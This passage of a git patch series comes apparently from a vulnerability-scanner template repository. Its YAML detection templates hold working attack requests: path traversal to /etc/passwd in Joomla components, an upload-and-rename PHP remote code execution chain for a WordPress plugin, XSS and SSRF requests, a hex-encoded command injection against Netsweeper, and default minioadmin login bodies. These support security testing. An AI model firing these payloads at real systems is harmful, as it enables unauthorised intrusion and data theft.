{{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Connection: close - Upgrade-Insecure-Requests: 1 - Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded _IWP_JSON_PREFIX_{{base64("{\"iwp_action\":\"add_site\",\"params\":{\"username\":\"§username§\"}}")}} diff --git a/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml b/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml index 481c5d6f76..eec6c6f958 100644 --- a/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml +++ b/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml @@ -15,8 +15,6 @@ requests: POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1 Host: {{Hostname}} Accept: */* - Connection: close - Content-Length: 693 Content-Type: multipart/form-data; boundary=6985fa39c0698d07f6d418b37388e1b2 --6985fa39c0698d07f6d418b37388e1b2 @@ -45,11 +43,7 @@ requests: - | POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1 Host: {{Hostname}} - User-Agent: python-requests/2.25.1 Accept: */* - Connection: close - X-Requested-With: XMLHttpRequest - Content-Length: 81 Content-Type: application/x-www-form-urlencoded eeSFL_ID=1&eeFileOld=nuclei.png&eeListFolder=%2F&eeFileAction=Rename%7Cnuclei.php @@ -58,7 +52,6 @@ requests: GET /wp-content/uploads/simple-file-list/nuclei.php HTTP/1.1 Host: {{Hostname}} Accept: */* - Connection: close matchers-condition: and matchers: diff --git a/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml b/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml index 402dc8c283..eb070bb0f2 100644 --- a/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml +++ b/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml @@ -11,18 +11,12 @@ requests: - | POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-GB,en;q=0.5 - Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------77916619616724262872902741074 - Content-Length: 241 Origin: null - Connection: close - Upgrade-Insecure-Requests: 1 -----------------------------77916619616724262872902741074 - Content-Disposition: form-data; name="upload"; filename="a.txt" + Content-Disposition: form-data; name="upload"; filename="{{randstr}}.txt" Content-Type: text/plain Test -----------------------------77916619616724262872902741074-- diff --git a/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml b/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml index a0a6785d10..7075c485bf 100644 --- a/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml +++ b/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml @@ -11,11 +11,7 @@ requests: - | POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1 Host: {{Hostname}} - Accept-Language: en - Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Content-Length: 158 - Connection: close action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=http://example.com From 6fee9b2b1beea8019f3464b821ce2dd74967bbea Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 8 Sep 2021 17:48:54 +0530 Subject: [PATCH 105/339] Create python-metrics.yaml --- misconfiguration/python-metrics.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 misconfiguration/python-metrics.yaml diff --git a/misconfiguration/python-metrics.yaml b/misconfiguration/python-metrics.yaml new file mode 100644 index 0000000000..6ff4afb35d --- /dev/null +++ b/misconfiguration/python-metrics.yaml @@ -0,0 +1,27 @@ +id: python-metrics + +info: + name: Detect Python Exposed Metrics + author: dhiyaneshDK + severity: low + description: Information Disclosure of Garbage Collection + tags: exposure,devops + reference: https://www.shodan.io/search?query=html%3A%22python_gc_objects_collected_total%22 + +requests: + - method: GET + path: + - "{{BaseURL}}/metrics" + + matchers-condition: and + matchers: + - type: word + part: body + condition: and + words: + - "python_gc_objects_collected_total" + - "python_info" + + - type: status + status: + - 200 From 85adcd95beb3c53cfb3b6c7a35c9adf8b8d5620b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 8 Sep 2021 17:58:43 +0530 Subject: [PATCH 106/339] Update python-metrics.yaml --- misconfiguration/python-metrics.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/misconfiguration/python-metrics.yaml b/misconfiguration/python-metrics.yaml index 6ff4afb35d..047cbfd1b5 100644 --- a/misconfiguration/python-metrics.yaml +++ b/misconfiguration/python-metrics.yaml @@ -6,8 +6,10 @@ info: severity: low description: Information Disclosure of Garbage Collection tags: exposure,devops - reference: https://www.shodan.io/search?query=html%3A%22python_gc_objects_collected_total%22 - + reference: + - https://www.shodan.io/search?query=html%3A%22python_gc_objects_collected_total%22 + - https://gist.github.com/ruanbekker/e5b1e7895f62b020ff29b5f40767190c + requests: - method: GET path: From 664ac520656aedcbcf49fa9255117cf0c40b6044 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 8 Sep 2021 18:09:15 +0530 Subject: [PATCH 107/339] Update python-metrics.yaml --- misconfiguration/python-metrics.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/python-metrics.yaml b/misconfiguration/python-metrics.yaml index 047cbfd1b5..65dcbe3063 100644 --- a/misconfiguration/python-metrics.yaml +++ b/misconfiguration/python-metrics.yaml @@ -9,7 +9,7 @@ info: reference: - https://www.shodan.io/search?query=html%3A%22python_gc_objects_collected_total%22 - https://gist.github.com/ruanbekker/e5b1e7895f62b020ff29b5f40767190c - + requests: - method: GET path: From 39a0ffd0a554697564428245d41f543f08f5213e Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 8 Sep 2021 18:19:15 +0530 Subject: [PATCH 108/339] Update python-metrics.yaml --- misconfiguration/python-metrics.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/misconfiguration/python-metrics.yaml b/misconfiguration/python-metrics.yaml index 65dcbe3063..593b019435 100644 --- a/misconfiguration/python-metrics.yaml +++ b/misconfiguration/python-metrics.yaml @@ -6,9 +6,9 @@ info: severity: low description: Information Disclosure of Garbage Collection tags: exposure,devops - reference: - - https://www.shodan.io/search?query=html%3A%22python_gc_objects_collected_total%22 - - https://gist.github.com/ruanbekker/e5b1e7895f62b020ff29b5f40767190c + reference: + - https://www.shodan.io/search?query=html%3A%22python_gc_objects_collected_total%22 + - https://gist.github.com/ruanbekker/e5b1e7895f62b020ff29b5f40767190c requests: - method: GET From 8828d0f2ed2d385f1534bc284f5114f10b8e59bc Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 9 Sep 2021 06:44:20 +0700 Subject: [PATCH 109/339] Create CVE-2010-1719.yaml --- cves/2010/CVE-2010-1719.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1719.yaml diff --git a/cves/2010/CVE-2010-1719.yaml b/cves/2010/CVE-2010-1719.yaml new file mode 100644 index 0000000000..b41a153cae --- /dev/null +++ b/cves/2010/CVE-2010-1719.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1719 + +info: + name: Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12233 + - https://www.cvedetails.com/cve/CVE-2010-1719 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From bbf4f2ffebade1a49f488b1a19c9f2370125b0f6 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 9 Sep 2021 09:25:04 +0700 Subject: [PATCH 110/339] Updates severity --- default-logins/frps/frp-default-credentials.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/frps/frp-default-credentials.yaml b/default-logins/frps/frp-default-credentials.yaml index f096e880f6..605d43a20e 100644 --- a/default-logins/frps/frp-default-credentials.yaml +++ b/default-logins/frps/frp-default-credentials.yaml @@ -3,7 +3,7 @@ id: frp-default-credentials info: name: Frp Default credentials author: pikpikcu - severity: info + severity: high tags: frp,default-login reference: https://github.com/fatedier/frp/issues/1840 From 6a75ff9242dbe9d179dd0e46ce39f9ae944853ed Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Thu, 9 Sep 2021 01:28:04 -0300 Subject: [PATCH 111/339] Create confluence-detector.yaml --- technologies/confluence-detector.yaml | 39 +++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 technologies/confluence-detector.yaml diff --git a/technologies/confluence-detector.yaml b/technologies/confluence-detector.yaml new file mode 100644 index 0000000000..a418291693 --- /dev/null +++ b/technologies/confluence-detector.yaml @@ -0,0 +1,39 @@ +id: confluence-detector + +info: + name: confluence detector + author: philippedelteil + severity: info + description: Allows you to detect Atlassian Confluence instances + tags: confluence + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/pages" + - "{{BaseURL}}/confluence" + - "{{BaseURL}}/wiki" + + redirects: true + stop-at-first-match: true + matchers-condition: or + + matchers: + - type: word + words: + - '-Confluence-' + - '-confluence-' + part: header + condition: or + + - type: word + words: + - 'confluence-base-url' + part: body + extractors: + - type: regex + part: body + group: 1 + regex: + - 'Atlassian Confluence ([a-z0-9-._]+)' From 9169fe37055a9c222c8115abecaa2cb7e0502b6a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 9 Sep 2021 11:31:44 +0530 Subject: [PATCH 112/339] Update and rename confluence-detector.yaml to confluence-detect.yaml --- ...nfluence-detector.yaml => confluence-detect.yaml} | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) rename technologies/{confluence-detector.yaml => confluence-detect.yaml} (82%) diff --git a/technologies/confluence-detector.yaml b/technologies/confluence-detect.yaml similarity index 82% rename from technologies/confluence-detector.yaml rename to technologies/confluence-detect.yaml index a418291693..168a3b1f53 100644 --- a/technologies/confluence-detector.yaml +++ b/technologies/confluence-detect.yaml @@ -1,11 +1,11 @@ -id: confluence-detector +id: confluence-detect info: - name: confluence detector - author: philippedelteil + name: Confluence Detect + author: philippedelteil severity: info description: Allows you to detect Atlassian Confluence instances - tags: confluence + tags: tech,confluence requests: - method: GET @@ -17,8 +17,7 @@ requests: redirects: true stop-at-first-match: true - matchers-condition: or - + matchers-condition: and matchers: - type: word words: @@ -31,6 +30,7 @@ requests: words: - 'confluence-base-url' part: body + extractors: - type: regex part: body From 43b45a7b631b41ad4a3e0d5617ce0593d79db057 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 9 Sep 2021 11:42:52 +0530 Subject: [PATCH 113/339] Update CVE-2020-12720.yaml --- cves/2020/CVE-2020-12720.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2020/CVE-2020-12720.yaml b/cves/2020/CVE-2020-12720.yaml index 092f2de376..289db507b6 100644 --- a/cves/2020/CVE-2020-12720.yaml +++ b/cves/2020/CVE-2020-12720.yaml @@ -13,6 +13,7 @@ requests: - | POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1 Host: {{Hostname}} + X-Requested-With: XMLHttpRequest Accept: */* Content-Type: application/x-www-form-urlencoded From 90eba9d88358fd387c564fe1b2cddd0ff729c860 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 9 Sep 2021 11:46:54 +0530 Subject: [PATCH 114/339] Update CVE-2020-7961.yaml --- cves/2020/CVE-2020-7961.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-7961.yaml b/cves/2020/CVE-2020-7961.yaml index d88be8f1b8..9f314f0f40 100644 --- a/cves/2020/CVE-2020-7961.yaml +++ b/cves/2020/CVE-2020-7961.yaml @@ -7,6 +7,7 @@ info: tags: cve,cve2020,rce,liferay description: Deserialization of Untrusted Data in Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers to execute arbitrary code via JSON web services (JSONWS). reference: + - https://www.synacktiv.com/en/publications/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html - https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html - https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271 @@ -43,4 +44,4 @@ requests: part: body regex: - "Microsoft Windows (.*)" - - "Distributor ID: (.*)" \ No newline at end of file + - "Distributor ID: (.*)" From 1f0b584bc8dda34f21261aa9314a27b0a744d099 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 9 Sep 2021 12:03:47 +0530 Subject: [PATCH 115/339] Update flir-ax8-default-credentials.yaml --- default-logins/flir/flir-ax8-default-credentials.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/default-logins/flir/flir-ax8-default-credentials.yaml b/default-logins/flir/flir-ax8-default-credentials.yaml index 20db518552..3f011e9350 100644 --- a/default-logins/flir/flir-ax8-default-credentials.yaml +++ b/default-logins/flir/flir-ax8-default-credentials.yaml @@ -4,7 +4,7 @@ info: name: Flir Default Credentials author: pikpikcu severity: medium - tags: default-login,flir + tags: default-login,flir,camera,iot requests: - raw: @@ -33,4 +33,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 08dac5638513f39d39dc26b468da8642d3be96e7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 9 Sep 2021 12:06:24 +0530 Subject: [PATCH 116/339] Update simple-employee-rce.yaml --- vulnerabilities/other/simple-employee-rce.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/other/simple-employee-rce.yaml b/vulnerabilities/other/simple-employee-rce.yaml index b9fc3b354d..f965f9f0b6 100644 --- a/vulnerabilities/other/simple-employee-rce.yaml +++ b/vulnerabilities/other/simple-employee-rce.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical reference: https://www.exploit-db.com/exploits/49596 - tags: rce + tags: rce,intrusive requests: - raw: @@ -13,6 +13,7 @@ requests: POST /dashboard/uploadID.php HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/javascript, */*; q=0.01 + X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------5825462663702204104870787337 -----------------------------5825462663702204104870787337 From 576499034d0a871894b555320fb7d06c18d65831 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 9 Sep 2021 12:09:13 +0530 Subject: [PATCH 117/339] Update wordpress-rce-simplefilelist.yaml --- vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml b/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml index eec6c6f958..60be402e20 100644 --- a/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml +++ b/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml @@ -7,7 +7,7 @@ info: reference: https://wpscan.com/vulnerability/10192 description: | The Simple File List WordPress plugin was found to be vulnerable to an unauthenticated arbitrary file upload leading to remote code execution. The Python exploit first uploads a file containing PHP code but with a png image file extension. A second request is sent to move (rename) the png file to a PHP file. - tags: wordpress,wp-plugin,rce + tags: wordpress,wp-plugin,rce,intrusive requests: - raw: @@ -43,6 +43,7 @@ requests: - | POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1 Host: {{Hostname}} + X-Requested-With: XMLHttpRequest Accept: */* Content-Type: application/x-www-form-urlencoded From 732f5e95ac9766c48d6b8d9f2cca0bba1050235d Mon Sep 17 00:00:00 2001 From: lu4nx Date: Thu, 9 Sep 2021 16:14:08 +0800 Subject: [PATCH 118/339] Add: TiDB Native password bruteforce check plugin --- network/tidb-native-cred-bruteforce.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 network/tidb-native-cred-bruteforce.yaml diff --git a/network/tidb-native-cred-bruteforce.yaml b/network/tidb-native-cred-bruteforce.yaml new file mode 100644 index 0000000000..6344da325e --- /dev/null +++ b/network/tidb-native-cred-bruteforce.yaml @@ -0,0 +1,19 @@ +id: tidb-native-password-bruteforce + +info: + name: TiDB DB with enabled native password + author: lu4nx + severity: info + tags: network,tidb,bruteforce,database + description: TiDB is fully compatible with the MySQL 5.7 protocol and the common features and syntax of MySQL 5.7. TiDB instance with enabled native password support prone vulnerable for password brute-force attack. + +network: + - host: + - "{{Hostname}}" + - "{{Hostname}}:4000" + + matchers: + - type: word + words: + - "mysql_native_password" + - "TiDB" From 6e98cbf67eef1bf528e336604fee59966be6e1be Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 9 Sep 2021 16:18:16 +0700 Subject: [PATCH 119/339] Create CVE-2010-1308.yaml --- cves/2010/CVE-2010-1308.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1308.yaml diff --git a/cves/2010/CVE-2010-1308.yaml b/cves/2010/CVE-2010-1308.yaml new file mode 100644 index 0000000000..991bc53f66 --- /dev/null +++ b/cves/2010/CVE-2010-1308.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1308 + +info: + name: Joomla! Component SVMap 1.1.1 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12066 + - https://www.cvedetails.com/cve/CVE-2010-1308 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 6ce33e2f47bbf7306b59de1e8b0a926b9172b90a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 9 Sep 2021 15:01:35 +0530 Subject: [PATCH 120/339] Rename phpwiki-lfi.yaml to vulnerabilities/other/phpwiki-lfi.yaml --- phpwiki-lfi.yaml => vulnerabilities/other/phpwiki-lfi.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename phpwiki-lfi.yaml => vulnerabilities/other/phpwiki-lfi.yaml (100%) diff --git a/phpwiki-lfi.yaml b/vulnerabilities/other/phpwiki-lfi.yaml similarity index 100% rename from phpwiki-lfi.yaml rename to vulnerabilities/other/phpwiki-lfi.yaml From 02e6ccfd7e27e31c232593a5a939f7623f90f7b3 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 9 Sep 2021 19:48:08 +0700 Subject: [PATCH 121/339] Create CVE-2018-15535.yaml --- cves/2018/CVE-2018-15535.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2018/CVE-2018-15535.yaml diff --git a/cves/2018/CVE-2018-15535.yaml b/cves/2018/CVE-2018-15535.yaml new file mode 100644 index 0000000000..5c53de530e --- /dev/null +++ b/cves/2018/CVE-2018-15535.yaml @@ -0,0 +1,27 @@ +id: CVE-2018-15535 + +info: + name: Responsive FileManager < 9.13.4 - Directory Traversal + author: daffainfo + severity: high + description: filemanager/ajax_calls.php in tecrail Responsive FileManager before 9.13.4 uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize get_file sequences such as ".." that can resolve to a location that is outside of that directory, aka Directory Traversal. + reference: + - https://www.exploit-db.com/exploits/45271 + - https://www.cvedetails.com/cve/CVE-2018-15535 + tags: cve,cve2018,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From bd24dc198e0988824f27886147c55cf1ca949c08 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 9 Sep 2021 19:08:13 +0530 Subject: [PATCH 122/339] Coverage for all templates using tags --- cves/2020/CVE-2020-12800.yaml | 1 + cves/2020/CVE-2020-13167.yaml | 4 +++- cves/2021/CVE-2021-3377.yaml | 1 + default-logins/minio/minio-default-password.yaml | 12 ++++++++---- .../prometheus-exposed-panel.yaml | 6 ++++-- exposures/configs/yii-debugger.yaml | 6 +++++- exposures/tokens/generic/shoppable-token.yaml | 1 + misconfiguration/front-page-misconfig.yaml | 1 + technologies/artica-web-proxy-detect.yaml | 4 ++++ technologies/basic-auth-detection.yaml | 1 + technologies/bigip-config-utility-detect.yaml | 1 + technologies/burp-api-detect.yaml | 1 + technologies/cacti-detect.yaml | 1 + technologies/clockwork-php-page.yaml | 2 ++ technologies/cockpit-detect.yaml | 1 + technologies/dell/dell-idrac6-detect.yaml | 2 ++ technologies/dell/dell-idrac7-detect.yaml | 2 ++ technologies/dell/dell-idrac8-detect.yaml | 2 ++ technologies/dell/dell-idrac9-detect.yaml | 2 ++ technologies/favicon-detection.yaml | 1 + technologies/firebase-detect.yaml | 2 ++ technologies/google-storage.yaml | 1 + technologies/graphql-detect.yaml | 1 + technologies/graylog-api-browser.yaml | 1 + technologies/gunicorn-detect.yaml | 4 +++- technologies/harbor-detect.yaml | 2 ++ technologies/home-assistant.yaml | 1 + technologies/ilo-detect.yaml | 1 + technologies/jaspersoft-detect.yaml | 1 + technologies/jellyfin-detect.yaml | 4 ++++ technologies/jolokia.yaml | 3 +++ technologies/kibana-detect.yaml | 1 + technologies/kong-detect.yaml | 1 + technologies/liferay-portal-detect.yaml | 2 ++ technologies/linkerd-badrule-detect.yaml | 8 ++------ technologies/lotus-domino-version.yaml | 2 ++ technologies/metabase-detect.yaml | 4 ++++ technologies/mrtg-detect.yaml | 2 ++ technologies/netsweeper-webadmin-detect.yaml | 1 + technologies/nginx-version.yaml | 3 +++ technologies/nifi-detech.yaml | 3 +++ technologies/oidc-detect.yaml | 2 ++ technologies/openam-detection.yaml | 1 + technologies/pi-hole-detect.yaml | 3 +++ technologies/prtg-detect.yaml | 2 ++ technologies/redmine-cli-detect.yaml | 1 + technologies/s3-detect.yaml | 1 + technologies/shiro-detect.yaml | 6 +++++- technologies/springboot-actuator.yaml | 4 ++++ technologies/sql-server-reporting.yaml | 1 + technologies/telerik-fileupload-detect.yaml | 2 ++ technologies/terraform-detect.yaml | 2 ++ technologies/tomcat-detect.yaml | 8 +++++--- technologies/tor-socks-proxy.yaml | 2 ++ technologies/weblogic-detect.yaml | 1 + technologies/werkzeug-debugger-detect.yaml | 1 + vulnerabilities/lsoft/listserv_maestro_rce.yaml | 1 + .../other/cacti-weathermap-file-write.yaml | 1 + .../other/caucho-resin-info-disclosure.yaml | 1 + vulnerabilities/other/pmb-local-file-disclosure.yaml | 1 + vulnerabilities/other/vpms-auth-bypass.yaml | 2 +- vulnerabilities/other/zms-auth-bypass.yaml | 1 + 62 files changed, 124 insertions(+), 20 deletions(-) rename {technologies => exposed-panels}/prometheus-exposed-panel.yaml (65%) diff --git a/cves/2020/CVE-2020-12800.yaml b/cves/2020/CVE-2020-12800.yaml index 4a4a96bb69..8216d0e966 100644 --- a/cves/2020/CVE-2020-12800.yaml +++ b/cves/2020/CVE-2020-12800.yaml @@ -6,6 +6,7 @@ info: severity: critical description: The drag-and-drop-multiple-file-upload-contact-form-7 plugin before 1.3.3.3 for WordPress allows Unrestricted File Upload and remote code execution by setting supported_type to php% and uploading a .php% file. reference: https://github.com/amartinsec/CVE-2020-12800 + tags: cve,cve2020,wordpress,wp-plugin requests: - raw: diff --git a/cves/2020/CVE-2020-13167.yaml b/cves/2020/CVE-2020-13167.yaml index ffe6eb67a4..961d153f44 100644 --- a/cves/2020/CVE-2020-13167.yaml +++ b/cves/2020/CVE-2020-13167.yaml @@ -9,13 +9,15 @@ info: reference: - https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/ - https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says + additional-fields: + hex-payload: 'echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out' requests: - method: GET path: - # Hex payload: echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out - "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5" - "{{BaseURL}}/webadmin/out" + headers: Referer: "{{BaseURL}}/webadmin/admin/service_manager_data.php" diff --git a/cves/2021/CVE-2021-3377.yaml b/cves/2021/CVE-2021-3377.yaml index 77ded129f4..1b44686e3e 100644 --- a/cves/2021/CVE-2021-3377.yaml +++ b/cves/2021/CVE-2021-3377.yaml @@ -8,6 +8,7 @@ info: - https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27 author: geeknik severity: medium + tags: cve,cve2021,xss,npm requests: - raw: diff --git a/default-logins/minio/minio-default-password.yaml b/default-logins/minio/minio-default-password.yaml index 7d2b90fde6..12c46a6efe 100644 --- a/default-logins/minio/minio-default-password.yaml +++ b/default-logins/minio/minio-default-password.yaml @@ -4,23 +4,27 @@ info: name: Minio Default Password author: pikpikcu severity: medium + tags: default-login,minio requests: - method: POST path: - "{{BaseURL}}/minio/webrpc" + headers: Content-Type: application/json - body: | - {"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"} + + body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"}' - method: POST path: - "{{BaseURL}}/minio/webrpc" + headers: Content-Type: application/json - body: | - {"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"web.Login"} + + body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"web.Login"}' + matchers-condition: and matchers: diff --git a/technologies/prometheus-exposed-panel.yaml b/exposed-panels/prometheus-exposed-panel.yaml similarity index 65% rename from technologies/prometheus-exposed-panel.yaml rename to exposed-panels/prometheus-exposed-panel.yaml index b107509968..2cda5cc379 100644 --- a/technologies/prometheus-exposed-panel.yaml +++ b/exposed-panels/prometheus-exposed-panel.yaml @@ -1,9 +1,11 @@ id: prometheus-exposed-panel + info: name: Prometheus.io exposed panel author: organiccrap severity: low - # usually runs on port http/9090 + tags: panel,prometheus + requests: - method: GET path: @@ -12,4 +14,4 @@ requests: matchers: - type: word words: - - Prometheus Time Series Collection and Processing Server + - 'Prometheus Time Series Collection and Processing Server' \ No newline at end of file diff --git a/exposures/configs/yii-debugger.yaml b/exposures/configs/yii-debugger.yaml index 11232d47b1..e93bfbf58e 100644 --- a/exposures/configs/yii-debugger.yaml +++ b/exposures/configs/yii-debugger.yaml @@ -4,7 +4,8 @@ info: name: View Yii Debugger Information author: geeknik reference: https://yii2-framework.readthedocs.io/en/stable/guide/tool-debugger/ - severity: info + severity: low + tags: yii,debug,exposure requests: - method: GET @@ -16,11 +17,14 @@ requests: - "{{BaseURL}}/sapi/debug/default/view" redirects: true + max-redirects: 2 + stop-at-first-match: true matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "Yii Debugger" diff --git a/exposures/tokens/generic/shoppable-token.yaml b/exposures/tokens/generic/shoppable-token.yaml index 0f68803be2..0c3d4080a0 100644 --- a/exposures/tokens/generic/shoppable-token.yaml +++ b/exposures/tokens/generic/shoppable-token.yaml @@ -5,6 +5,7 @@ info: author: philippedelteil severity: info reference: https://ask.shoppable.com/knowledge/quick-start-api-guide + tags: exposure,shoppable,token requests: - method: GET diff --git a/misconfiguration/front-page-misconfig.yaml b/misconfiguration/front-page-misconfig.yaml index 7e982772b0..8d49471b46 100644 --- a/misconfiguration/front-page-misconfig.yaml +++ b/misconfiguration/front-page-misconfig.yaml @@ -5,6 +5,7 @@ info: author: JTeles,pikpikcu severity: info reference: https://docs.microsoft.com/en-us/archive/blogs/fabdulwahab/security-protecting-sharepoint-server-applications + tags: misconfig,exposure,frontpage requests: - method: GET diff --git a/technologies/artica-web-proxy-detect.yaml b/technologies/artica-web-proxy-detect.yaml index 82b19cfb2d..8fd487f5ee 100644 --- a/technologies/artica-web-proxy-detect.yaml +++ b/technologies/artica-web-proxy-detect.yaml @@ -1,18 +1,22 @@ id: artica-web-proxy-detect + info: name: Artica Web Proxy Detect author: 